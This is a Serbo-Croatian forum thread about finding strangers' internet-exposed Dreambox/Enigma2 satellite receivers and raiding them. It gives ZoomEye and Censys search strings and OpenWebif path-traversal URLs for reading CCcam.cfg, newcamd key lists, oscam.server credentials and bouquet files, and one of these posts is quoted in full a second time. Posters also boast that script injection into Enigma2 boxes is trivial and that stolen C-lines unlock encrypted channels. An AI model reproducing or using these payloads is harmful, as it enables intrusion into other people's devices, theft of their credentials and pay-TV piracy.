Интернет радио и телевизија (стримови, прашања, генерална дискусија...)

Член од
27 февруари 2017
Мислења
650
Поени од реакции
1.083
Evo koga zanimaju dreamovi da nalazi ,npr sa zoomeye
"Streamproxy -info"
"X-SATIP-RTSP-Port: 8554"
ili izvlacenje iz dreamboxa odredjenog filea npr po zelji
/bouqueteditor/tmp/bouquets_backup.tar
/file?file=../../../../../../../../../../../../../var/etc/CCcam.cfg
/file?file=../../../../../../../../../../../../../var/keys/newcamd.list
/file?file=../../../../../../../../../../../../../etc/tuxbox/config/oscam.server
/file?file=../../../../../../../../../../../../../etc/enigma2/userbouquet.favourites.tv
A nastavci su vam u openwebif ,nastavci za kanale su fiksni,isti i u mom dreamboxu i u nekom tamo drugom,download bouquet koji hoces,total npr,izmjenis ip i probas,na hiljade toga ima
 
Член од
24 јули 2016
Мислења
2.456
Поени од реакции
4.009
blage veze vi nemate a glumite neke wannabe znalce. Lupetate na najjače. Pitate se da li stream kasni zbog c linije a c linija i stream nemaju nikakve veze. Stream ide iz tuner-a a c linija "obrađuje" ECM-ove koji vuče iz ts a ne mpeg iz ts. To nema veze jedno s drugim, jedno je ts s kojim vam stiže ton i slika a drugo su ECM koji kontroliraju kodiranje kanala, c linija služi za dekodiranje. Dalje, kad vlasnik dreamobox-a gleda neki kanal onda možete gledati kanale u tom frekvencijskom range-u. Recimo on gleda neki kanal koji je na 12355V frekvenciji onda vi možete gledati kanale samo s te frekvencije. Obično ih bude 10-15 ovisno o tome koje su kvalitete itd...da vam ne objašnjavam sad još i to....Jedan tuner ne može u isto vrijeme davati sliku sa 2 frekvencije!!!! Ako on ništa ne gleda onda vi slobodno gledate što vam je volja jer ste tada jedini user na tuneru.
Nadalje, ulazak u dreambox je vrlo jednostavan jer je enigma2 bugovita. Ili se može ući preko web interface-a i doslovno s 3-4 klika napraviti cijeli backup ili se može rješiti skriptom koja ima doslovno 4 linije. Inject-anje skripte u dreambox može odraditi balavac od 12 godina. Može se i napraviti backup bouquet-a pa se na IP adresu dodaju samo nastavci. Sve je to jednostavno i nije nikakva nauka.
Ovaj forum je mjesto hvalisanja i nitko ništa ovdje više ne može naučiti, sve veliki znalci. Sve jebeni slikari kojima je vrhunac upload slike.
End and over !!!!!
Slusaj ti pricas a nemas pojima sad si ispricao ovdje clanovima kako racunati do 10.Sa jednim tunerom si mozes zna sta.Jel sam kolegi napisao 1,2,3,najbolje 4 vrh.Pa na tunere sam mislio nades sa 3 i gledas .Izgleda ti nikad nisu cuo da 3 tunera imaju nekoji ja sa 4 nalazio.Pametujes nesto a nemas pojima.
To sta si sad napisao ovi sta love iptv nista im nije jasno.Sve mi znamo kako ferca al izgleda si se ti pogubio o cemo mi ovdje razglabamo.
Автоматски споено мислење:

@grado i, nisi mi odgovorio na postavljena pitanja, jer bih voleo nesto novo da saznam od pametnih ljudi
Ma pusti ga ti znas svoje ti radi i gledas,ja sam napisao da ja prefiriram c ,ovaj oce da te lovi na tunere,sto vise tunera to bolje i kraj prici svako gleda sta hoce i kako oce a da je pink pink sranje u kojem god ga obliku gledali je.Sta se das isprovocirat.
 
Последно уредено:
Член од
26 октомври 2019
Мислења
559
Поени од реакции
1.341
A mogu li meni,ovi sto sve znaju,objasniti kako to da moja zena gleda sta hoce,sa linux resiverom,u dnevnoj sobi a ja,u drugoj sobi ili na poslu,gledam fudbal na lap.sa istog resivera"OpenWebif" i zabavljam se na Kajgani?? Da nisam prekrsio zakon gravitacije??:unsure:
 
Последно уредено:
Член од
27 февруари 2017
Мислења
21
Поени од реакции
18
[QUOTE = "olbih, post: 9215437, član: 88338"]
Evo koga zanimaju dreamovi da nalazi ,npr sa zoomeye
"Streamproxy -info"
"X-SATIP-RTSP-priključak: 8554"
ili izdvajanje određene datoteke iz snova, npr. po želji
/bouqueteditor/tmp/bouquets_backup.tar
/file?file=../../../../../../../../../../../../../var/etc/CCcam.cfg
/file?file=../../../../../../../../../../../../../var/keys/newcamd.list
/file?file=../../../../../../../../../../../../../etc/tuxbox/config/oscam.server
/file?file=../../../../../../../../../../../../../etc/enigma2/userbouquet.favourites.tv
A nastavci su vam u openwebif ,nastavci za kanale su fiksni,isti i u mom dreamboxu i u nekom tamo drugom,download bouquet koji hoces,total npr,izmjenis ip i probas,na hiljade toga ima
[/ CITAT]

https://censys.io/ ili ovaj
 
Член од
24 јули 2016
Мислења
2.456
Поени од реакции
4.009
Sad kad obojica imata taj čudesni skener i GB lista stvarno bi mi dobro došla koja višekonekcijska exyu lista.
Pa pošaljita koju :)
Znas koliko je listi nekad propalo 249 servera nikad vidlo dana 5,7 giga,evo clan fukavac nek potvrdi dal lazem kod njega su sad na usb.Sta hocu da kazem ljudi su pokvareni nesto im das trce to objavit drugdje 99% ovdje clanova ima i moze,samo 1% vas mozda nezna e sad koji su to 1% to ni dragi bog nezna a kamoli neko od nas ovdje.Mozda najveci reseler najvise trazi ovdje liste i pravi se ono ko to moze garantirat taj nema.
Автоматски споено мислење:

Žašto bi to negdje objavio kad znam da posle i sam to ne mogu gledati.
Mozda ti bas imas najvise odakle da mi to znamo.
 
Член од
24 јули 2016
Мислења
2.456
Поени од реакции
4.009
Danas si morska krava,mamut sutra si marko i jovo na novo i tako u krug.
Автоматски споено мислење:

E to je to o tome govorimo taj moze primat i davat i nije iz rusije hahss.,nisu rusi sto posto hahaaa
 
Член од
5 јануари 2019
Мислења
115
Поени од реакции
143
E sad si mene našao kao da sam reseler.Nisam reseler, niti gazda kojeg servera samo sam mislio,da bar
jednu listu od mnogih koje imaš možeš dati.Ali dobro,zaboravi.
 
Член од
24 септември 2019
Мислења
2.478
Поени од реакции
3.756
pa, onda udjete u drim, i mozda nesto i nadjete u njemu, sem njegovih satelitskih kanala, npr. iptv liste, c linije, a sa onih u koje ne mozete da udjete, mozete da povadite svasta, ako nesto share-uje, odredjenim skenerom ;)
Автоматски споено мислење:

pa, sa c linijom npr. otkljucas zakljucane kanale sa npr. 5 satelita ;) :D
 

Kajgana Shop

На врв Bottom